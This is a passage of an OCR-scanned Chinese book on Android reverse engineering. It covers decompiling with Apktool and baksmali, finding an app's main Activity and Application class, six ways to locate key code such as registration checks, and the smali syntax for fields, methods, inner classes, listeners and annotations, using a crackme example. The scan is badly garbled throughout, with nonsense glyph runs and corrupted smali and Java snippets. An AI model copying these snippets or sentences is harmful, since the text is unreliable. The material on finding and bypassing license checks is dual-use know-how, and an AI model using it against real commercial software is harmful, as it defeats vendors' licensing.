效果 ， 而 且 也 能 为 分 析 人 员 节 省 不 少时 间 。 

静态 分 析 Android 程 序 有 两 种 方法 : 一 种 方法 是 阅读 反 汇 编 生 成 的 
Dalvik 字 节 码 ， 可 以 使 用 IDA Pro 分 析 dex 文 件 ， 或 者 使 用 文本 编辑 器 阅读 
baksmali 反 编译 生成 的 smali 文 件 ;， 另 一 种 方法 是 阅读 反 汇 编 生 成 的 Java 源 
码 ， 可 以 使 用 dex2jar 生 成 jar 文 件 ， 然 后 再 使 用 jd-gui 阅 读 jar 文 件 的 代码 。 


5.2 ”快速 定位 Android 程 序 的 关键 代码 


在 逆向 一 个 Android 软 件 时 ， 如 果 讶 目的 分 析 ， 可 能 需要 阅读 成 千 上 万 
行 的 反 汇编 代码 才能 找到 程序 的 关键 点 ， 这 无 疑 是 瀛 费时 间 的 表现 ， 本 小 
节 将 介绍 如 何 快速 的 定位 程序 的 关键 代码 。 


5.2.1 反 编 译 apk 程 序 


每 个 apk 文 件 中 都 包含 有 一 个 AndroidManifest.xml 文 件 ， 它 记录 着 软件 
的 一 些 基 本 信息 。 包 括 软 件 的 包 名 、 运 行 的 系统 版 本 、 用 到 的 组 件 等 。 并 
且 这 个 文件 被 加 密 存储 进 了 apk 文 件 中 ， 在 开始 分 析 前 ， 有 必要 先 反 编译 
apk 文 件 对 其 进行 解密 。 反 编译 apk 的 工具 使 用 前 面 章节 介绍 过 的 Apktool。 
Apktool 提 供 了 反 编 译 与 打包 apk 文 件 的 功能 。 本 小 节 使 用 到 的 实例 程序 为 
crackme0502.apk ， 按 照 前 面 使 用 Apktool 的 步骤 ， 在 命令 提示 符 下 输入 
*apktool d crackme0502.apk” 即 可 反 编译 成 功 。 


5.2.2 ”程序 的 主 Activity 


我 们 知道 ， 一 个 Android 程 序 由 一 个 或 多 个 Activity 以 及 其 它 组 件 组 成 ， 
每 个 Activity 都 是 相同 级 别 的 ， 不 同 的 Activity 实 现 不 同 的 功能 。 每 个 Activity 
都 是 Android 程 序 的 一 个 显示 “页 面 ”， 主 要 负责 数据 的 处 理 及 展示 工作 ， 在 
Android 程 序 的 开发 过 程 中 ， 程 序 员 很 多 时 候 是 在 编写 用 户 与 Activity 之 间 的 
交互 代码 。 

每 个 Android 程 序 有 且 只 有 一 个 主 Activity (隐藏 程序 除外 ， 它 没有 主 
Activity) ， 它 是 程序 启动 的 第 一 个 Activity。 打 开 crackme0502 文 件 夹 下 的 
AndroidManifest.xml 文 件 ， 其 中 有 如 下 片断 的 代码 。 


«activity android:label-"Gstring/title activity main" android:name-". MainActivity"> 
«intent-filter» 
«action android:name-"android.intent.action.MAIN" /> 
«category android:name-"android.intent.category.LAUNCHER" /> 
«/intent-filter» 


«/activity» 


在 程序 中 使 用 到 的 Activity 都 需要 在 AndroidManifest,xml 文 件 中 手动 声 
明 ， 声 明 Activity 使 用 activity 标 签 ， 其 中 android:label 指 定 Activity 的 标题 ， 
android:name 指 定 具 体 的 Activity 类 ，“.MainActivity” 前 面 省 略 了 程序 的 包 
名 ， 完 整 类 名 应 该 为 com.droider.crackme0502.MainActivity，intent-filter 指 定 
了 Activity 的 启动 意图 ，android.intent.action.MAIN 表 示 这 个 Activity 是 程序 的 
主 Activity。 android.intent.categoryLAUNCHER 表 示 这 个 Activity 可 以 通过 
LAUNCHER 来 启动 。 如 果 AndroidMenifestxml 中 ， 所 有 的 Activity 都 没有 添 
加 android.intent.categoryLAUNCHER ， 那 么 该 程序 安装 到 Android 设 备 上 
后 ， 在 程序 列表 中 是 不 可 见 的 ， 同 样 的 ， 如 果 没 有 指定 
android.intent.action.MAIN ，Android 系 统 的 LAUNCHER 就 无 法 匹配 程序 的 
主 Activity， 因 此 该 程序 也 不 会 有 图 标 出 现 。 

在 反 编译 出 的 AndroidManifest.xml 中 找到 主 Activity 后 ， 可 以 直接 去 查 
看 其 所 在 类 的 OnCreate() 方 法 的 反 汇编 代码 ， 对 于 大 多 数 软件 来 说 ， 这 里 就 
是 程序 的 代码 入 口 处 ， 所 有 的 功能 都 从 这 里 开始 得 到 执行 ， 我 们 可 以 沿 着 
这 里 一 直 向 下 查看 ， 追 踪 软 件 的 执行 流程 。 


5.2.3” 需 重点 关注 的 Application 类 


如 果 需 要 在 程序 的 组 件 之 间 传 递 全 局 变量 ， 或 者 在 Activity 启 动 之 前 做 
一 些 初始 化 工作 ， 就 可 以 考虑 使 用 Application 类 了 。 使 用 Application 时 需要 
在 程序 中 添加 一 个 类 继承 自 android.app.Application ， 然 后 重 写 它 的 
OnCreate() 方 法 ， 在 该 方法 中 初始 化 的 全 局 变量 可 以 在 Android 其 它 组 件 中 访 
问 ， 当 然 前 提 条 件 是 这 些 变量 具有 public 属 性 。 最 后 还 需要 在 
AndroidManifest.xml 文 件 的 Application 标 签 中 添加 “android:name” 属 性 ， 取 值 
为 继承 自 android.app.Application 的 类 名 。 

鉴于 Application 类 比 程序 中 其 它 的 类 启动 得 都 要 早 ， 一 些 商业 软件 将 授 
权 验 证 的 代码 都 转移 到 了 该 类 中 。 例 如 ， 在 OnCreate() 方 法 中 检测 软件 的 购 
买 状 态 ， 如 果 状 态 异常 则 拒绝 程序 继续 运行 。 因 此 ， 在 分 析 Android 程 序 过 


程 中 ， 我 们 需要 先 查看 该 程序 是 否 具 有 Application 类 ， 如 果 有 ， 就 要 看 看 它 
的 OnCreate() 方 法 中 是 否 做 了 一 些 影响 到 逆向 分 析 的 初始 化 工作 。 


5.2.4 ”如 何 定 位 关键 代码 一 一 六 种 方法 


一 个 完整 的 Android 程 序 反 编译 后 的 代码 量 可 能 非常 庞大 ， 要 想 在 这 洗 
如 烟 海 的 代码 中 找到 程序 的 关键 代码 ， 是 需要 很 多 经 验 与 技巧 的 。 笔 者 经 
过 长 时 间 的 探索 ， 总 结 了 以 下 几 种 定位 代码 的 方法 。 

e 信息 反馈 法 

所 谓 信息 反馈 法 ， 是 指 先 运行 目标 程序 ， 然 后 根据 程序 运行 时 给 出 的 
反馈 信息 作为 突破 口 寻 找 关键 代码 。 在 第 2 章 中 ， 我 们 运行 目标 程序 并 输入 

错误 的 注册 码 时 ， 会 弹出 提示 “无 效用 户 名 或 注册 码 ”， 这 就 是 程序 反馈 给 
我 们 的 信息 。 通 常情 况 下 ， 程 序 中 用 到 的 字符 串 会 存储 在 String.xml 文 件 或 
者 人 硬 编 码 到 程序 代码 中 ， 如 果 是 前 者 的 话 ， 字 符 串 在 程序 中 会 以 id 的 形式 访 
问 ， 只 需 在 反 汇 编 代 码 中 搜索 字符 串 的 id 值 即 可 找到 调用 代码 处 ; 如 果 是 后 
者 的 话 ， 在 反 汇 编 代 码 中 直接 搜索 字符 串 即 可 。 


e 特征 函数 法 

E UE 与 信息 反馈 法 类 似 。 在 信息 反馈 法 中 ， 无 论 程序 
给 出 什么 样 的 反馈 信息 ， 终 究 是 需要 调用 Android SOKA HHAH APIR 
数 来 完成 的 。 比 如 弹出 注册 码 错误 的 提示 信息 就 需要 调用 
Toast.MakeText0.Show0) 方 法 ， 在 反 汇 编 代 码 中 直接 搜索 Toast 应 该 很 快 就 能 
定位 到 调用 代码 ， 如 果 Toast 在 程序 中 有 多 处 的 话 ， 可 能 需要 分 析 人 员 逐 个 
hallo 

。 顺序 查看 法 

顺序 查看 法 是 指 从 软件 的 启动 代码 开始 ， 逐 行 的 向 下 分 析 ， 掌 握 软 件 
的 执行 流程 ， 这 种 分 析 方 法 在 病毒 分 析 时 经 常用 到 。 

e 代码 注入 法 


代码 注入 法 属于 动态 调试 方法 ， 它 的 原理 是 手动 修改 apk 文 件 的 反 汇编 
代码 ， 加 入 Log 输 出 ， 配合 LogCat 查 看 程序 执行 到 特定 点 时 的 状态 数据 。 这 
种 方法 在 解密 程序 数据 时 经 常 使 用 ， 详 细 的 内 容 会 在 本 书 的 第 8 章 介 绍 。 


o 栈 跟踪 法 
栈 跟 踪 法 属于 动态 调试 方法 ， 它 的 原理 是 输出 运行 时 的 栈 跟踪 信息 ， 
然后 查看 栈 上 的 函数 调用 序列 来 理解 方法 的 执行 流程 ， 这 种 方法 的 详细 内 
容 会 在 本 书 的 第 8 章 介绍 。 
e Method Profiling 


Method Profiling (方法 剖析 ) 属于 动态 调试 方法 ， 它 主要 用 于 热点 分 
析 和 性 能 优化 。 该 功能 除了 可 以 记录 每 个 水 数 占 用 的 CPU 时 间 外 ， 还 能 够 
跟踪 所 有 的 函数 调用 关系 ， 并 提供 比 栈 跟 踪 法 更 详细 的 函数 调用 序列 报 
告 ， 这 种 方法 在 实践 中 可 帮助 分 析 人 员 节 省 很 多 时 间 ， 也 被 广泛 使 用 ， 详 
细 的 内 容 会 在 本 书 的 第 8 章 介 绍 。 


5.3 smali 文 件 格式 


使 用 Apktool 反 编译 apk 文 件 后 ， 会 在 反 编 译 工 程 目 录 下 生成 一 个 smali 
文件 夹 ， 里 面 存 放 着 所 有 反 编 译 出 的 smali 文 件 ， 这 些 文件 会 根据 程序 包 的 
层次 结构 生成 相应 的 目录 ， 程 序 中 所 有 的 类 都 会 在 相应 的 目录 下 生成 独立 
的 smai 文件 。 如 上 一 节 中 程序 的 主 Activity 名 为 
com.droider.crackme0502.MainActivity ， 就 会 在 smali 目 录 下 依次 生成 
comMroidencrackme0502 目录 结构 ， 然 后 在 这 个 目录 下 生成 
MainActivity.smali 文 件 。 

smali 文 件 的 代码 通常 情况 下 比较 长 ， 而 且 指 令 繁多 ， 在 阅读 时 很 难 用 
肉眼 捕捉 到 重点 ， 如 果 有 阅读 工具 能 够 将 特殊 指令 (例如 条 件 跳 转 指 令 
高 亮 显示， 势必 会 让 分 析 工 作 事 半 功 倍 ， 为 此 笔者 专门 为 文本 编辑 器 


Notepad++ 编 写 了 smali 语 法 文件 来 支持 高 亮 显示 与 代码 折 仅 ， 并 以 此 作为 
smali 代 码 的 阅读 工具 。 

无 论 是 普通 类 、 抽 象 类 、 接 口 类 或 者 内 部 类 ， 在 反 编译 出 的 代码 中 ， 
它们 都 以 单独 的 smali 文 件 来 存放 。 每 个 smali 文 件 都 由 若干 条 语句 组 成 ， 所 
有 的 语句 都 遵循 着 一 套 语法 规范 。 在 smali 文 件 的 头 3 行 描述 了 当前 类 的 一 些 
信息 ， 格 式 如 下 。 

.Class < 功 / 问 权 户 > [修饰 关键 字 ] < 类 名 > 

.SUper a T 

source < JX f$» 

打开 MainActivity.smali 文 件 ， 头 3 行 代码 如 下 。 


.class public Lcom/droider/crackme0502/MainActivity; 
.Super Landroid/app/Activity; 


.source "MainActivity.java" 

第 1 行 “.class” 指 令 指 定 了 当前 类 的 类 名 。 在 本 例 中 ， 类 的 访问 权限 为 
public， 类 名 为 “Lcom/droidercrackme0502/MainActivity;”， 类 名 开头 的 工 是 
遵循 Dalvik 字 节 码 的 相关 约定 ， 表 示 后 面 跟随 的 字符 串 为 一 个 类 。 

第 2 行 的 “ .super 指令 指定 了 当前 类 的 父 类 。 本 例 中 的 
“Lcom/droider/crackme0502/MainActivity;” 的 父 类 为 
“Landroid/app/Activity;”o 

第 3 行 的 “.source” 指 令 指定 了 当前 类 的 源 文件 名 。 

回想 一 下 ， 在 上 一 章 中 讲解 dex 文 件 格式 时 介绍 的 DexClassDef 结 构 ， 这 
个 结构 描述 了 一 个 类 的 详细 信息 ， 该 结构 的 第 1 个 字段 classIdx 就 是 类 的 类 型 
索引 ， 第 3 个 字段 superclassIdx 就 是 指向 类 的 父 类 类 型 索引 ， 第 5 个 字段 
sourceFileIdx 就 是 指向 类 的 源 文件 名 的 字符 串 索引 。baksmali 在 解析 dex 文 件 
时 ， 也 是 通过 这 3 个 字段 来 获取 相应 的 类 的 值 。 


注意 


经 过 混淆 的 dex 文 件 ， 反 编译 出 来 的 smali 代 码 可 能 没有 源 文 件 信息 ， 因 此 ,“.source" 行 的 代码 可 


前 3 行 代码 过 后 就 是 类 的 主体 部 分 了 ， 一 个 类 可 以 由 多 个 字段 或 方法 组 
成 。smali 文 件 中 字段 的 声明 使 用 “.field” 指 令 。 字 段 有 静态 字段 与 实例 字段 
两 种 。 静 人 态 字段 的 声明 格式 如 下 。 

# static fields 

.field < FIRER static [修饰 关键 字 ] < 字 上 成 各 >:< 字 成 类 型 > 

baksmali 在 生成 smali 文 件 时 ， 会 在 静态 字段 声明 的 起 始 处 添加 “static 
fields” 注 释 ，smali 文 件 中 的 注释 与 Dalvik 语 法 一 样 ， 也 是 以 井 号 “#' 开 头 。 
“.field” 指 令 后 面 跟 着 的 是 访问 权限 ， 可 以 是 public、Pprivate、 protected 之 
一 。 修 饰 关键 字 描 述 了 字段 的 其 它 属 性 ， 如 synthetic。 指 令 的 最 后 是 字段 名 
与 字段 类 型 ， 使 用 冒号 “: ”分 隔 ， 语 法 上 与 Dalvik 也 是 一 样 的 。 

实例 字段 的 声明 与 静态 字段 类 似 ， 只 是 少 了 static 关 键 字 ， 它 的 格式 如 
下 。 

# instance fields 

field < 访问 权 服 > [修饰 关键 字 ] «EET LEES 

比如 以 下 的 实例 字段 声明 。 


# instance fields 


.field private btnAnno:Landroid/widget/Button; 

第 1 行 的 “instance fields” 是 baksmali 生 成 的 注释 ， 第 2 行 表示 一 个 私有 字 
段 bnAnno， 它 的 类 型 为 “Landroid/widget/Button;”。 

如 果 一 个 类 中 含有 方法 ， 那 么 类 中 必然 会 有 相关 方法 的 反 汇编 代码 ， 
smali 文 件 中 方法 的 声明 使 用 “method” 指 令 。 方 法 有 直接 方法 与 虚 方 法 两 
种 。 直 接 方法 的 声明 格式 如 下 。 


# direct methods 
method < VITA [1E fc EE] ZZ IA 
«€ locals? 
[.parameter] 
[.prologue] 
[.line] 
cff 
.end method 
*direct methods” 是 baksmali 添 加 的 注释 ， 访 问 权 限 和 修饰 关键 字 与 字段 
的 描述 相同 ， 方 法 原型 描述 了 方法 的 名 称 、 参 数 与 返回 值 。“.locals” 指 定 了 
使 用 的 局 部 变量 的 个 数 。“.parameter” 指 定 了 方法 的 参数 ， 与 Dalvik 语 法 中 使 
用 “.parameters” 指 定 参 数 个 数 不 同 ， 每 个 “.parameter” 指 令 表 明 使 用 一 个 参 
数 ， 比 如 方法 中 有 使 用 到 3 个 参数 ， 那 么 就 会 出 现 3 条 “.parameter” 指 令 。 
“.prologue” 指 定 了 代码 的 开始 处 ， 混 淆 过 的 代码 可 能 去 掉 了 该 指令 。 “.line>” 
指定 了 该 处 指令 在 源 代码 中 的 行 号 ， 同 样 的 ， 混 淆 过 的 代码 可 能 去 除了 行 
号 信息 。 
虚 方 法 的 声明 与 直接 方法 相同 ， 只 是 起 始 处 的 注释 为 “virtual 
methods”。 
如 果 一 个 类 实现 了 接口 ， 会 在 smali 文 件 中 使 用 “.implements” 指 令 指 
出 。 相 应 的 格式 声明 如 下 。 
7 interfaces 
implements «fZL1&- 
“# interfaces" Æ baksmali 28 DU B 3 [17€ RE, “implements” ze $ O X 888 
字 ， 后 面 的 接口 名 是 DexClassDef 结 构 中 interfacesOfft 字 段 指定 的 内 容 。 
如 果 一 个 类 使 用 了 注解 ， 会 在 smali 文 件 中 使 用 “.annotation” 指 令 指 出 。 
注解 的 格式 声明 如 下 。 


# annotations 
annotation 5. diia DAE E 
DERT = [fü] 
.end annotation 
注解 的 作用 范围 可 以 是 类 、 方 法 或 字段 。 如 果 注 解 的 作用 荡 围 是 类 ， 
* annotation" ihi 令 会 直接 定义 在 smali 文 件 中 ， 如 果 是 方法 或 字段 ， 
“.annotation” 指 令 则 会 包含 在 方法 或 字段 定义 中 。 例 如 下 面 的 代码 。 


开 A fields 
.field public sayWhat:Ljava/lang/String; 
.annotation runtime Lcom/droider/anno/MyAnnoField; 
info = "Hello my friend" 
.end annotation 
.end field 
实例 字段 aayWhat 为 String 类 型 ， 它 使 用 了 com.droider.anno.MyAnnoField 
注解 ， 注 解 字 段 info 值 为 “Hello my friend”。 将 其 转换 为 Java 代 码 为 : 


@ com.droider.anno MyAnnoField(info = "Hello my friend") 


public String sayWhat; 


5.4 Android 程序 中 的 类 


介绍 完了 smali 文 件 格式 ， 下 面 我 们 来 看 看 Android 程 序 反 汇编 后 生成 了 
哪些 smali 文 件 ， 这 些 smali 文 件 的 代码 又 有 些 什 么 特点 。 


5.4.1 ”内 部 类 


Java 语 言 允 许 在 一 个 类 的 内 部 定义 男 一 个 类 ， 这 种 在 类 中 定义 的 类 被 称 
为 内 部 类 (Inner Class) 。 内 部 类 可 分 为 成 员 内 部 类 、 静 态 骨 套 类 、 方法 内 
部 类 、 匿 名 内 部 类 。 前 面 我 们 曾经 说 过 ， baksmali 在 反 编译 dex 文 件 的 时 
候 ， 会 为 每 个 类 单独 生成 了 一 个 smali 文 件 ， 内 部 类 作为 一 个 独立 的 类 , "C 


也 拥有 自己 独立 的 smali 文 件 ， 只 是 内 部 类 的 文件 名 形式 为 “[ 外 部 类 ]$[ 认 部 
类 ].smali”， 例 如 下 面 的 类 。 


class Outer { 


class Innert{} 


} 


baksmali 反 编译 上 述 代 码 后 会 生成 两 个 文件 : Outersmali 与 
Outer$Innersmali o 查看 5.2 节 生成 的 smai 文 件 ， 发 现在 
smali\com\droidern\crackme0502 目 录 下 有 一 个 MainActivity$ SNChecker.smali 
文件 ， 这 个 SNChecker 就 是 MainActivity 的 一 个 内 部 类 。 打 开 这 个 文件 ， 代 
码 结构 如 下 。 

.class public Lcom/droider/crackme0502/MainActivitySSNChecker; 


.super Ljava/lang/Object; 


.Source "MainActivity.java" 


# annotations 

.annotation system Ldalvik/annotation/EnclosingClass; 
value - Lcom/droider/crackme0502/MainActivity; 

.end annotation 

.annotation system Ldalvik/annotation/InnerClass; 
accessFlags = 0x1 
name = "SNChecker" 


.end annotation 


# instance fields 
.field private sn:Ljava/lang/String; 


.field final synthetic this$0:Lcom/droider/crackme0502/MainActivity; 


# direct methods 
.method public constructor 


<init>(Lcom/droider/crackme0502/MainActivity;Ljava/lang/String;)V 


.end method 


# virtual methods 
.method public isRegistered()Z 


.end method 


发 现 它 有 两 个 注解 定义 块 “Ldalvik/annotation/EnclosingClass;” 与 
“Ldalvik/annotation/InnerClass;”、 两 个 实例 字段 Sn 与 this$0、 一 个 直接 方法 
init()、 一 个 虚 方 法 isRegistered()。 注 解 定义 块 我 们 稍 后 进行 讲解 。 先 看 它 的 
实例 字段 ，sn 是 字符 串 类 型 ，this$0 是 MainActivity 类 型 ，synthetic 关 键 字 表 
明 它 是 “合成 ”的 ， 那 this$0 到 底 是 个 什么 东西 呢 ? 

其 实 this$0 是 内 部 类 自动 保留 的 一 个 指向 所 在 外 部 类 的 引用 。 左 边 的 
this 表 示 为 父 类 的 引用 ， 右 边 的 数值 0 表示 引用 的 层 数 。 我 们 看 下 面 的 类 。 

public class Outer { / /thisS0 

public class FirstInner ( //this$1 
public class SecondInner { //this$2 


public class ThirdInner { 


) 

每 往 里 一 层 右 边 的 数值 就 加 一 ， 如 ThirdInner 类 访问 Firstnner 类 的 引用 
为 this$1。 在 生成 的 反 汇 编 代 码 中 ，this$X 型 字段 都 被 指定 了 synthetic 属 性 ， 
表明 它们 是 被 编译 器 合成 的 、 虚 构 的 ， 代 码 的 作者 并 没有 声明 该 字段 。 

我 们 再 看 看 MainActivity$SNChecker 的 构造 水 数 ， 看 它 是 如 何 初 始 化 
的 。 代 码 如 下 。 


# direct methods 

.method public constructor 

«init» (Lcom/droider/crackme0502/MainActivity;Ljava/lang/String;)V 
.locals 0 
. parameter # 第 一 个 参数 Mainactivitvy 引 用 


.parameter "sn" # 第 二 个 参数 字符 串 sn 


.prologue 

.line 83 

iput-object pl, p0, Lcom/droider/crackme0502/MainActivity$SNChecker; 
->this$0:Lcom/droider/crackme0502/Mainactivity; # 将 Mainactivitv 引 用 
赋值 给 thiss$0 

invoke-direct {p0}, Ljava/lang/Object;-»«init»()V # 调 用 默认 的 构造 函数 

.line 84 

iput-object p2, p0, Lcom/droider/crackme0502/MainActivity$SNChecker;-> 

sn:Ljava/lang/String; 

# 将 sn 字符 串 的 值 赋 给 sn 字段 

.line 85 

return-void 

.end method 


细心 的 读者 会 发 现 ， 这 上段 代码 声明 时 使 用 “.parameter” 指 令 指 是 了 两 个 
参数 ， 而 实际 上 却 使 用 了 p0 人 ~p2 共 3 个 寄存 器 ， 为 什么 会 出 现 这 种 情况 呢 ? 
在 第 3 章 介 绍 Dalvik 虚 拟 机 时 曾经 讲 过 ， 对 于 一 个 非 静 态 的 方法 而 言 ， 会 隐 
含 的 使 用 p0 寄 存 器 当 作 类 的 this 引 用 。 因 此 ， 这 里 的 确 是 使 用 了 3 个 寄存 
器 : p0 表 示 MainActivity$SNChecker 自 身 的 引用 ，p1 表 示 MainActivity 的 引 
用 ，p2 表 示 sn 字 符 串 。 另 外 ， 从 MainActivity$SNChecker 的 构造 图 数 可 以 看 
出 ， 内 部 类 的 初始 化 共有 以 下 3 个 步骤 : 首先 是 保存 外 部 类 的 引用 到 本 类 的 
一 个 synthetic 字 段 中 ， 以 便 内 部 类 的 其 它 方法 使 用 ， 然 后 是 调用 内 部 类 的 父 
类 的 构造 函数 来 初始 化 父 类 ， 最 后 是 对 内 部 类 自身 进行 初始 化 。 


5.4.2 ”监听 器 


Android 程 序 开 发 中 大 量 使 用 到 了 监听 器 ， 如 Button 的 点 击 事件 响应 
OnClickListener、Button 的 长 按 事件 响应 OnLongClickListener、ListView 列 表 
项 的 点 击 事件 响应 OnItemSelectedListener 等 。 由 于 监听 器 只 是 临时 使 用 一 


次 ， 没 有 什么 复 用 价值 ， 因 此 ， 在 实际 编写 代码 的 过 程 中 ， 多 采用 匿名 内 
部 类 的 形式 来 实现 。 如 下 面 的 按钮 点 击 事件 响应 代码 。 


btn.setOnClickListener(new android.view.View.OnClickListener() { 


GOverride 
public void onClick(View v) ( 


P 

监听 器 的 实质 就 是 接口 ， 在 Android 系统 源码 的 
frameworks\base\core\java\android\view\View.java 文件 中 可 以 发 现 
OnClickListener 监 听 器 的 代码 如 下 。 


public interface OnClickListener { 


J** 
* Called when a view has been clicked. 
* param v The view that was clicked. 
wy 
void onClick(View v); 
) 
设置 按钮 点 击 事件 的 监听 器 只 需要 实现 View.OnClickListener 的 onClick() 
方法 即 可 。 打 开 5.2 节 的 MainActivity.smali 文 件 ， 在 OnCreate() 方 法 中 找到 设 
置 按钮 点 击 事件 监听 器 的 代码 如 下 。 


.method public onCreate(Landroid/os/Bundle;)V 

.locals 2 

.parameter "savedInstanceState" 

.line 32 

iget-object v0, p0, Lcom/droider/crackme0502/MainActivity;-»btnAnno: 

Landroid/widget/Button; 

new-instance vl, Lcom/droider/crackme0502/MainActivity$1; # 新 建 一 个 

MainActivity$1 实 例 

invoke-direct (v1, p0}, Lcom/droider/crackme0502/MainActivity$1; 
-»«init» (Lcom/droider/crackme0502/MainActivity;)V # 初 始 化 MainActivitys$1 
实例 

invoke-virtual (v0, v1), Landroid/widget/Button; 
-»setOnClickListener(Landroid/view/ViewS$OnClickListener; )V # 设 置 按钮 
点 击 事件 监听 器 

.line 40 

iget-object v0, p0, Lcom/droider/crackme0502/MainActivity; 
-»btnCheckSN:Landroid/widget/Button; 

new-instance vl, Lcom/droider/crackme0502/MainActivity$2; # 新 建 一 个 

MainActivity$2 实 例 

invoke-direct (vl, p0}, Lcom/droider/crackme0502/MainActivity$2 
-»«init»(Lcom/droider/crackme0502/MainActivity;)V; # 初 始 化 MainActivity$2 
实例 

invoke-virtual (v0, v1), Landroid/widget/Button; 
-»setOnClickListener (Landroid/view/View$OnClickListener;)V$tik BAI 
点 击 事件 监听 器 

.line 50 

return-void 


.end method 


OnCreate() 方 法 分 别 了 调用 按钮 对 象 的 setOnClickListener() 方 法 来 设置 
点 击 事件 的 监听 器 。 第 一 个 按钮 传 入 了 一 个 MainActivity$1 对 象 的 引用 ， 第 
二 个 按钮 传 入 了 一 个 MainActivity$2 对 象 的 引用 ， 我 们 到 
MainActivity$1.smali 文 件 中 看 一 下 前 者 的 实现 ， 它 的 代码 大 致 如 下 。 


.class Lcom/droider/crackme0502/MainActivity$1; 
.Super Ljava/lang/Object; 


.Source "MainActivity.java" 


# interfaces 


.implements Landroid/view/ViewSOnClickListener; 


# annotations 
.annotation system Ldalvik/annotation/EnclosingMethod; 
value = Lcom/droider/crackme0502/MainActivity;- -»onCreate(Landroid/os/ 
Bundle;)V 
.end annotation 
.annotation system Ldalvik/annotation/InnerClass; 
accessFlags = 0x0 
name - null 


.end annotation 


# instance fields 


.field final synthetic this$0:Lcom/droider/crackme0502/MainActivity; 


# direct methods 
.method constructor «init» (Lcom/droider/crackme0502/MainActivity;)V 


.end method 


* virtual methods 


.method public onClick(Landroid/view/View;)V 


.end method 
ftMainActivity$1.smali X fF B7T 3 fi FH T "implements" 8 FH EZAK 


现 了 按钮 点 击 事件 的 监听 器 接口 ， 因 此 ， 这 个 类 实现 了 它 的 OnClick0) 方 
法 ， 这 也 是 我 们 在 分 析 程 序 时 关心 的 地 方 。 另 外 ， 程 序 中 的 注解 与 监听 器 
的 构造 函数 都 是 编译 器 为 我 们 自己 生成 的 ， 实 际 分 析 过 程 中 不 必 关 心 。 


5.4.3 ”注解 类 


注解 是 Java 的 语言 特性 ， 在 Android 的 开发 过 程 中 也 得 到 了 广泛 的 使 
Android 系 统 中 涉及 到 注解 的 包 共 有 两 个 : 一 个 是 dalvik.annotation ， 该 


程序 包 下 的 注解 不 对 外 开放 ， 仅 供 核 心 库 与 代码 测试 使 用 ， 所 有 的 注解 声 
明 位 于 Android 系 统 源 码 的 libcore\dalvik\src\main\java\dalvik\annotation 目 录 
F; 另 一 个 是 android.annotation ， 相 应 注解 声明 位 于 Android 系 统 源码 的 
frameworks\base\core\java\android\annotation 目 录 下 。 在 前 面 介 绍 的 smali 文 件 
中 ， 可 以 发 现 很 多 代码 都 使 用 到 了 注解 类 ， 首 先是 MainActivity.smali 文 件 ， 
其 中 有 一 段 代码 如 下 。 
# annotations 
.annotation system Ldalvik/annotation/MemberClasses; 
value - ( 
Lcom/droider/crackme0502/MainActivityS$SNChecker; 
) 


.end annotation 


MemberClasses 注 解 是 编译 时 自动 加 上 的 ， 查 看 MemberClasses 注 解 的 源 
码 ， 代 码 如 下 。 
/ * ck 
* A "system annotation" used to provide the MemberClasses list. 
wf 
GRetention(RetentionPolicy.RUNTIME) 
GTarget(ElementType.ANNOTATION TYPE) 


Ginterface MemberClasses í() 

从 注释 可 以 看 出 ，MemberClasses 注 解 是 一 个 “系统 注解 ”， 作 用 是 为 父 
类 提供 一 个 MemberClasses 列 表 。MemberClasses 即 子 类 成 员 集合 ， 通 俗 的 讲 
就 是 一 个 内 部 类 列表 。 

接着 是 MainActivity$1.smali 文 件 ， 其 中 有 一 段 代 码 如 下 。 


# annotations 

.annotation system Ldalvik/annotation/EnclosingMethod; 
value - Lcom/droider/crackme0502/MainActivity;-»onCreate(Landroid/os/ 
Bundle;)V 


.end annotation 
EnclosingMethod 注 解 用 来 说 明 整 个 MainActivity$1 类 的 作用 范围 ， 其 中 
的 Method 表 明 它 作用 于 一 个 方法 ， 而 注解 的 value 表 明 它 位 于 MainActivity 的 


onCreate() 方 法 中 。 与 EnclosingMethod 对 应 的 还 有 EnclosingClass 注 解 ， 在 
MainActivity$SNChecker.smali 文 件 中 有 如 下 一 段 代 码 。 


# annotations 
.annotation system Ldalvik/annotation/EnclosingClass; 


value - Lcom/droider/crackme0502/MainActivity; 


.end annotation 


.annotation system Ldalvik/annotation/InnerClass; 
accessFlags = 0x1 
name - "SNChecker" 
.end annotation 
EnclosingClass 注 解 表 明 MainActivity$SNChecker 作 用 于 一 个 类 ， 注 解 的 
value 表明 这 个 类 是 MainActivity。 在 EnclosingClass 注 解 的 下 面 是 
InnerClass， 它 表明 自身 是 一 个 内 部 类 ， 其 中 的 accessFlags 访 问 标志 是 一 个 
枚 举 值 ， 声 明 如 下 。 


enum { 
kDexVisibilityBuild = 0x00, /* annotation visibility */ 
kDexVisibilityRuntime = 0x01, 
kDexVisibilitySystem - 0x02, 


); 

为 1 表明 它 的 属性 是 Runtime。name 为 内 部 类 的 名 称 ， 本 例 为 
SNCheckero 

如 果 注 解 类 在 声明 时 提供 了 默认 值 ， 那 么 程序 中 会 使 用 到 
AnnotationDefault 注解 。 打开 5.2 小 节 smali\icom\droiden\anno 目 录 下 的 
MyAnnoClass.smali 文 件 ， 有 如 下 一 段 代码 。 


# annotations 
.annotation system Ldalvik/annotation/AnnotationDefault; 
value - .subannotation Lcom/droider/anno/MyAnnoClass; 
value - "MyAnnoClass" 
.end subannotation 


.end annotation 


可 以 看 到 ， 此 处 的 MyAnnoClass 类 有 一 个 默认 值 为 *MyAnnoClass”。 


除了 以 上 介绍 的 注解 外 ， 还 有 Signature 与 Throws 注 解 。Signature 注 解 用 
于 验证 方法 的 签名 ， 如 下 面 的 代码 中 ，onItemClick0) 方 法 的 原型 与 Signature 
注解 的 value 值 是 一 致 的 。 
.method public onItemClick(Landroid/widget/AdapterView;Landroid/view/View; 
IJ)V 
.locals 6 
.parameter 
.parameter "v" 
.parameter "position" 


.parameter "id" 
.annotation system Ldalvik/annotation/Signature; 


value = ( 
zz icon 
"Landroid/widget/AdapterView", 
au 
"Landroid/view/View;", 
"TIIM" 

} 


.end annotation 


.end method 


如 果 方 法 的 声明 中 使 用 throws 关 键 字 抛 出 异常 ， 则 会 生成 相应 的 Throws 
注解 。 示 例 代 码 如 下 。 
.method public final get()Ljava/lang/Object; 


.locals 1 
.annotation system Ldalvik/annotation/Throws; 


value - ( 
Ljava/lang/InterruptedException;, 
Ljava/util/concurrent/ExecutionException; 


) 
.end annotation 


.end method 
示例 的 get0 方 法 抛 出 了 InterruptedException 与 ExecutionException 两 个 异 
常 ， 将 其 转换 为 Java 代 码 如 下 。 


public final Object get() throws InterruptedException, ExecutionException { 


